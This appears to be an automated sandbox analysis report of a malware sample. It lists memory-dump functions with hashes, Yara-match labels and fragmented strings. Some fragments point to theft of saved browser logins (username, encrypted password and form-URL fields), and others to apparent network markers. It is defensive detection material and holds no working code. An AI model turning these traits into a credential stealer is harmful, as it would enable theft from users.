                                  Uniqueness Score: -1.00%

                                  Function 1E3B841F, Relevance: .1, Instructions: 64COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                  • Instruction ID: 5a997e8936a07a3d5e6ed4091dd66b87fb4ad1fcba47ec51653e3f89f3374aeb
                                  • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                  • Instruction Fuzzy Hash: 2C21A276E00119CBCB14CFA9C58068AF3F9FB8C350F664565E909B7740C630AE04CBD0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AA62F, Relevance: 52.7, Strings: 42, Instructions: 166COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                  • API String ID: 0-2319971335
                                  • Opcode ID: b6640069b56c6dd554e9905695e1d68e4ba1f552cb887cba28312a2f9d32b7f9
                                  • Instruction ID: ae65c3d48bbd0659a61ed06e8805bb19d1ce4d1e83ddffa362f52d64f1216885
                                  • Opcode Fuzzy Hash: b6640069b56c6dd554e9905695e1d68e4ba1f552cb887cba28312a2f9d32b7f9
                                  • Instruction Fuzzy Hash: 4191FFF09052998ACB118F55A4603DFBF71BB96304F1581E9C6AA7B243C3BE4E45DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AA630, Relevance: 52.7, Strings: 42, Instructions: 166COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                  • API String ID: 0-2319971335
                                  • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                  • Instruction ID: 78f3a27e39930dfba236ad084cbe448cc1feeddc48c7bf41f9d010fe98b1e848
                                  • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                  • Instruction Fuzzy Hash: D79100F09052A98ACB118F55A4603DFBF71BB96304F1581E9C6AA7B243C3BE4E45DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A4D20, Relevance: 41.5, Strings: 33, Instructions: 232COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$N$\$\$\$\$\$\$d$e$e$e$e$f$i$i$i$k$k$n$o$o$o$o$q$r$r$s$s$t$u$w
                                  • API String ID: 0-1512772454
                                  • Opcode ID: 88747fde188403112f670db32edd2ef98a785ce881c190d2ce91c79c6c78ecca
                                  • Instruction ID: 8ab33469e6e6143f360a657d5cdfbb33a1b71b0e216d3340fc44c96a7019a0fb
                                  • Opcode Fuzzy Hash: 88747fde188403112f670db32edd2ef98a785ce881c190d2ce91c79c6c78ecca
                                  • Instruction Fuzzy Hash: F4913DB1C2021CAADB50EFA4DC45FEFB7B9EF45704F004599A20867142EFB556888FB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A3BD0, Relevance: 34.1, Strings: 27, Instructions: 358COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $ x64$ x86$1$4.1$:$C$FBNG:$P$P$T$a$e$e$e$e$i$m$o$o$o$r$r$s$t$t$u
                                  • API String ID: 0-4053805006
                                  • Opcode ID: 552fdc4455252ba1dccf152314ada8dca078a8464bf6eebd19288ab449785ec1
                                  • Instruction ID: a5e1ca35d276374ac50a3e5591ec5d206d59029f439d3e3549059a0f783adf12
                                  • Opcode Fuzzy Hash: 552fdc4455252ba1dccf152314ada8dca078a8464bf6eebd19288ab449785ec1
                                  • Instruction Fuzzy Hash: 9DE171B1D00319AFDB20DFA4DC85FEEB7B8EF44704F004559F619A6142EBB16A44CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B2A20, Relevance: 25.2, Strings: 20, Instructions: 231COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: 0128f85985c26ba666ced4ae8da043a129cce5e7bb5a6c72cc46e606ff259830
                                  • Instruction ID: e7c14f5bae1b5b65c6ea1b7de319ad05efecf480b9b5f075d141ca7c82b4ca02
                                  • Opcode Fuzzy Hash: 0128f85985c26ba666ced4ae8da043a129cce5e7bb5a6c72cc46e606ff259830
                                  • Instruction Fuzzy Hash: 6B818FB1D0021CAEEB60DF94DC45FEEB7BDEF45304F0041A9E608A6142EBB55A85CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B2A15, Relevance: 25.1, Strings: 20, Instructions: 89COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                  • API String ID: 0-3236418099
                                  • Opcode ID: 0092a3ae07810523693425136c9453f1b8b1a2a17cc7329c0c77c67dd73a38eb
                                  • Instruction ID: a6ec3ebebcbf6d6b38cce9fa72211dc1fc785257b55fbbf7b6087641ed84d068
                                  • Opcode Fuzzy Hash: 0092a3ae07810523693425136c9453f1b8b1a2a17cc7329c0c77c67dd73a38eb
                                  • Instruction Fuzzy Hash: 2341E6B0D0032CDEEB60DFA58849BDEBBB9BF05344F1041A9D50CAB252DBB54A88CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B2D60, Relevance: 25.1, Strings: 20, Instructions: 64COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $ $O$S$\$\$a$a$a$a$a$e$e$i$l$o$o$p$r$t
                                  • API String ID: 0-815130641
                                  • Opcode ID: a9bcb7365ca2ce380005e7c901d1fec2f7089e4cce5eac6c03313bafffe133b8
                                  • Instruction ID: dda63df5196bc078e3523a2de54101bd29bb8cff49e2395db412a29e58873b7c
                                  • Opcode Fuzzy Hash: a9bcb7365ca2ce380005e7c901d1fec2f7089e4cce5eac6c03313bafffe133b8
                                  • Instruction Fuzzy Hash: ED213071D01318AAEB209F85A849BEDBFBAAB40718F10411DE5142F282D7F655888FA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B2D5B, Relevance: 25.1, Strings: 20, Instructions: 59COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $ $O$S$\$\$a$a$a$a$a$e$e$i$l$o$o$p$r$t
                                  • API String ID: 0-815130641
                                  • Opcode ID: 997cabf110fea851f65a28fc27b7dcc2eaa742e24c207ee706e93480c564a563
                                  • Instruction ID: bd36c0e21fce51bb2bf8f47e414e0f8f7d820d2fa6a57b2d35f85b1f35e98c34
                                  • Opcode Fuzzy Hash: 997cabf110fea851f65a28fc27b7dcc2eaa742e24c207ee706e93480c564a563
                                  • Instruction Fuzzy Hash: 77212FB0D01318EAEB209F819849BEEBFB6AB41718F10411CE6142F283D7F55588CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B0B00, Relevance: 24.0, Strings: 19, Instructions: 251COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: C$D$I$\$a$a$c$e$e$l$n$o$o$r$r$s$s$t$y
                                  • API String ID: 0-2101568155
                                  • Opcode ID: afa046bdf6afc22409e305749ee05c96e74e39756b9dd64447c34cb05de1f67d
                                  • Instruction ID: 3f64f9f0080269cca2d02a308fcb683ab53b9a2e67e2b9bf09b2552ae6235415
                                  • Opcode Fuzzy Hash: afa046bdf6afc22409e305749ee05c96e74e39756b9dd64447c34cb05de1f67d
                                  • Instruction Fuzzy Hash: 239184B1900218AFEB10DF94DC81FFF77B9EF45704F004199FA08AA242E7B59A45CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B3690, Relevance: 23.9, Strings: 19, Instructions: 142COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$I$O$R$V$_$c$k$l$n$o$r$r$r$t$t$u$v$x
                                  • API String ID: 0-784799069
                                  • Opcode ID: 79a86586d0f1dacf5e146d29b12aba98b226ab725346620f54d98a00c02bf818
                                  • Instruction ID: 2357d41dc954a46958c3d6d33bf5a42f75c08aaf65e21bad92843e8d2347dce6
                                  • Opcode Fuzzy Hash: 79a86586d0f1dacf5e146d29b12aba98b226ab725346620f54d98a00c02bf818
                                  • Instruction Fuzzy Hash: 765101B1D0021CAFEB10DF94DC45BEEBBB9FF05304F104159E509AB242EBB55A498FA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B368C, Relevance: 23.9, Strings: 19, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$I$O$R$V$_$c$k$l$n$o$r$r$r$t$t$u$v$x
                                  • API String ID: 0-784799069
                                  • Opcode ID: 357c77219d371963e6ee792ed9a0331f6f3b3c0d0d20bafc7a67063392094a55
                                  • Instruction ID: b0c4a9d63ba9fcaa496437838b3c2ae0123f3eb24f4590ace02c75631c3d8c84
                                  • Opcode Fuzzy Hash: 357c77219d371963e6ee792ed9a0331f6f3b3c0d0d20bafc7a67063392094a55
                                  • Instruction Fuzzy Hash: E451FEB1D0021CAFEB10DFA4CC45BEEBBB5FF05704F104159E509AB242EBB55A498FA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085782, Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 2cc78a09d19c5f398008ea1688b95cc8c1ddcb03024eefdda9b8bb31da4d6ad0
                                  • Instruction ID: 73e64fc32340113dacefdb35a901d7e757bfa75ab477fdfff88fe98d6615e3f1
                                  • Opcode Fuzzy Hash: 2cc78a09d19c5f398008ea1688b95cc8c1ddcb03024eefdda9b8bb31da4d6ad0
                                  • Instruction Fuzzy Hash: 93B17C30518B488EDB59EF68C486AEEB7F1FF98300F50451EE49AC7252EF709509CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000ADA72, Relevance: 21.6, Strings: 17, Instructions: 314COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -$[$[$[$[$[$]$]$]$]$]$a$e$e$l$n$s
                                  • API String ID: 0-2169243036
                                  • Opcode ID: aefed377e6b9dd76546872dde354152b5a9589cf92073fb2fdd46920ed19effa
                                  • Instruction ID: adf5d9ac9f50d2cb9c44aba74a03c35b01eead4761e692c32700a174f6f0f895
                                  • Opcode Fuzzy Hash: aefed377e6b9dd76546872dde354152b5a9589cf92073fb2fdd46920ed19effa
                                  • Instruction Fuzzy Hash: 1EB193B1940708BEE721EBA4CC46FEF77BDAF85704F10450DF619AA183D7B46A048BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000ADA80, Relevance: 21.6, Strings: 17, Instructions: 300COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -$[$[$[$[$[$]$]$]$]$]$a$e$e$l$n$s
                                  • API String ID: 0-2169243036
                                  • Opcode ID: b8ae7c339b3627a49d1867c27647f77422e7de7049ed03b0b04f6546fee1d2f8
                                  • Instruction ID: 29ac62a1034f4604b30f40ed640d1e213c812cc010e24f2ff3de7819b7b672aa
                                  • Opcode Fuzzy Hash: b8ae7c339b3627a49d1867c27647f77422e7de7049ed03b0b04f6546fee1d2f8
                                  • Instruction Fuzzy Hash: 14A174B1940708BAE721EFA4CC46FEF77BDAF85704F10450DF6196A183DBB46A048BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00083612, Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: 8dab225b675e87295ecb355eb4acc288fd441c33828d87c5f9f3d896b10e54c1
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: 7A41B5B0A18B088BDB54EF88A4466BDBBE6FB88B00F00015ED449D3241DB759D458BD6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008A2B2, Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: db62fff25af3925e54917691914b2a67e7062e3ca37b09e7646a6b912e4320e8
                                  • Instruction ID: 58a75ddbbf06e799913a4e225ad28db6bf3e7b29a2989fb133575a17c115e766
                                  • Opcode Fuzzy Hash: db62fff25af3925e54917691914b2a67e7062e3ca37b09e7646a6b912e4320e8
                                  • Instruction Fuzzy Hash: 4EC15970618A099FC758FF24C895AEAF3E1FB94304F40472EA49AC7252DF30E655CB86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B60B0, Relevance: 17.8, Strings: 14, Instructions: 250COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$a$a$e$e$e$g$g$i$i$i$j$p$p
                                  • API String ID: 0-4291551930
                                  • Opcode ID: 303ef244b2833382ea5bfa3f779d4ff6f1c2b407e5361214df37d93f081ac8fb
                                  • Instruction ID: 6b74928f5bc5a3819ba1ac1afb9af5fba7d15bc45b65ff592c2cb4a8007aaeea
                                  • Opcode Fuzzy Hash: 303ef244b2833382ea5bfa3f779d4ff6f1c2b407e5361214df37d93f081ac8fb
                                  • Instruction Fuzzy Hash: 02914F71900708EFDB60DF94CD81BEEB7F9AF88B00F144659E509A7641E775AA84CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B60AA, Relevance: 17.7, Strings: 14, Instructions: 234COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .$a$a$e$e$e$g$g$i$i$i$j$p$p
                                  • API String ID: 0-4291551930
                                  • Opcode ID: 3202f3ba2c0218fa46bb127fd6140430a785adf47272c2f444f67532aa646c91
                                  • Instruction ID: 22ffa9d1699b562d667c83277ee21135bad691efd10d650551cd9beae5a564e5
                                  • Opcode Fuzzy Hash: 3202f3ba2c0218fa46bb127fd6140430a785adf47272c2f444f67532aa646c91
                                  • Instruction Fuzzy Hash: 12914E71900608EFDB60DFA4CD81BEEB7F5AF88B00F14465DE509A7641E775AA84CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AFA70, Relevance: 16.4, Strings: 13, Instructions: 173COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: 6d38a37dddbf03812769f72ff4792f0ccaa2fbf3c0127631d9b00a6b9815caac
                                  • Instruction ID: a918445db95bc36bb22261a8d16e602a3b8980c5a36e5711d2f382256670d40b
                                  • Opcode Fuzzy Hash: 6d38a37dddbf03812769f72ff4792f0ccaa2fbf3c0127631d9b00a6b9815caac
                                  • Instruction Fuzzy Hash: 4A613EB1D1121CAEEB20DFA4DC85FEEB7B9FF08704F044199E509A6182EBB156448BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000AFA74, Relevance: 16.4, Strings: 13, Instructions: 154COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                  • API String ID: 0-392141074
                                  • Opcode ID: 2113eddc6b5e047b2ee245198f7cb34527a46739312f87a6151fb3d7430911ad
                                  • Instruction ID: ced6f8ab44c59384fafa646991555a8780ec1cb41bb8edfc7f6a7a3045ea6040
                                  • Opcode Fuzzy Hash: 2113eddc6b5e047b2ee245198f7cb34527a46739312f87a6151fb3d7430911ad
                                  • Instruction Fuzzy Hash: 93512EB1D1131CAEEB20DFA4DC85FEEBBB9BF08704F044199E505A6182EBB15648CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008A712, Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: cb05d673c47a7ae2d66d815ca6a228a047ad20eafb62a31d774487998a22b97f
                                  • Instruction ID: 8af2fe3e132801dcac638476a72f08ff7383c4ca036f9b1018cfffb237210925
                                  • Opcode Fuzzy Hash: cb05d673c47a7ae2d66d815ca6a228a047ad20eafb62a31d774487998a22b97f
                                  • Instruction Fuzzy Hash: C151B53161C7488FE719EF14C8856EAB7E5FB85700F50192EE8CBC7242DBB49946CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0008A703, Relevance: 15.2, Strings: 12, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: 6fb96763e362278f29aaf6212eb91c83152d30290888df31e90a76596c9fb0f8
                                  • Instruction ID: 6a0b7589b78360ebc70d3e7fb679b44841d54648f40d51e5e1547ddc700f771a
                                  • Opcode Fuzzy Hash: 6fb96763e362278f29aaf6212eb91c83152d30290888df31e90a76596c9fb0f8
                                  • Instruction Fuzzy Hash: 3C51B63161C7488FE719EF14C8856EAB7E5FB85700F50192EE8CBC7242DBB499468B83
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B0E30, Relevance: 15.1, Strings: 12, Instructions: 121COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: F$P$T$T$d$d$f$i$r$r$u$x
                                  • API String ID: 0-2987356081
                                  • Opcode ID: 6c09b4e5d43f8d5e20711fb89adcb53a0dd9dd0b47ea858b6f56f79e5e765038
                                  • Instruction ID: 7de5be67c5a17dde6875be8988bf8a07ed5995c5f5b3340484d4569f7ccd318a
                                  • Opcode Fuzzy Hash: 6c09b4e5d43f8d5e20711fb89adcb53a0dd9dd0b47ea858b6f56f79e5e765038
                                  • Instruction Fuzzy Hash: B341A3B1D40308AAEB20EF919C85FFFBABDEF45744F00801CF5086A182EBB51548CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A5F40, Relevance: 13.9, Strings: 11, Instructions: 124COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: c987f607e4ce4c33816ff60d143d5a082171580bc336b1d85ccebbdcb8a017c0
                                  • Instruction ID: a01f2bf30912c7a616771ae7abcb9bbf2e860969851ca0fa916cb0d3782afdbd
                                  • Opcode Fuzzy Hash: c987f607e4ce4c33816ff60d143d5a082171580bc336b1d85ccebbdcb8a017c0
                                  • Instruction Fuzzy Hash: 8A41F8B2D00218AFDB10DFD5DC84AEEBBBDFB49304F40855DE618A6241DB755A48CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A4790, Relevance: 13.8, Strings: 11, Instructions: 82COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                  • API String ID: 0-685823316
                                  • Opcode ID: 997915999a32ada887ffa25d3286ff161adfebba720a2e3bfac0e7948eeabe15
                                  • Instruction ID: 3688c8b02f66e99035dac50edc0206cddd95ad0885c631008876d069c9adf47a
                                  • Opcode Fuzzy Hash: 997915999a32ada887ffa25d3286ff161adfebba720a2e3bfac0e7948eeabe15
                                  • Instruction Fuzzy Hash: DA216FB1D51218AEEF50DFE4DC45BEEBBB9BB08704F04815CF608BA181DBB55648CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000B2F70, Relevance: 12.8, Strings: 10, Instructions: 345COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                  • API String ID: 0-2304485323
                                  • Opcode ID: 4da9edf88cb84a9c508d5f536f27f5cfe666f47b77b4e151636add9a39c46a19
                                  • Instruction ID: e366eefa65c55351d1fa119fecfa58c93f7a83fa79f49b205102d143842db91d
                                  • Opcode Fuzzy Hash: 4da9edf88cb84a9c508d5f536f27f5cfe666f47b77b4e151636add9a39c46a19
                                  • Instruction Fuzzy Hash: 76D1EBB5A10308AFDB50DFA4CC81FEEB7F9AF48704F104519F119E7242EBB8A9458B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A37B0, Relevance: 12.8, Strings: 10, Instructions: 323COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 200 OK$FBC$FBNG$FBNG$FBNG$FBNG$FBNG$FBNG$FBNG$FBNG
                                  • API String ID: 0-3117044114
                                  • Opcode ID: 6b6bdac660679db8f516e2fdb0b86b3b7a54880e74a63f10a23ce797908f010d
                                  • Instruction ID: 66e350a97439542f60f45a45bca2c419f6dda2b9344cdfcbfe27470936fc90a9
                                  • Opcode Fuzzy Hash: 6b6bdac660679db8f516e2fdb0b86b3b7a54880e74a63f10a23ce797908f010d
                                  • Instruction Fuzzy Hash: 3DA12A71B002086FCB60CEE4E8817FAB3E9EB96324F54416AF91D8B202D7756F55C792
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000ACBE0, Relevance: 12.7, Strings: 10, Instructions: 225COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "$"$"$/$P$e$i$m$o$r
                                  • API String ID: 0-163326737
                                  • Opcode ID: b0c4d570c84ffd7ee3dd166d3ccb65ba8b7f310f49d1b95d4cada518f5ad9f08
                                  • Instruction ID: 90ce43b814846be9d09a4ed12d8572fb49bd2097e9a8e580c6aab3da184abea5
                                  • Opcode Fuzzy Hash: b0c4d570c84ffd7ee3dd166d3ccb65ba8b7f310f49d1b95d4cada518f5ad9f08
                                  • Instruction Fuzzy Hash: 388181B1C5021C6BDB25EBA4DC82FEF737C9F44704F008599B50966183EBB567588FA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000ACBD4, Relevance: 12.7, Strings: 10, Instructions: 218COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "$"$"$/$P$e$i$m$o$r
                                  • API String ID: 0-163326737
                                  • Opcode ID: 5e99847a6d120cea6e5fadcc641422f8a6a202e9aad6ae5e7eb28614a9383ce4
                                  • Instruction ID: edb1fe6098a997c821e7f22b934a1bcf6f69c71b3cde93a43cc23d7d1a69ff5b
                                  • Opcode Fuzzy Hash: 5e99847a6d120cea6e5fadcc641422f8a6a202e9aad6ae5e7eb28614a9383ce4
                                  • Instruction Fuzzy Hash: 4C817EB1C5021C6BDB25EBA4DC82FEF737CAF44704F008599B509A6183EBB557498FA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

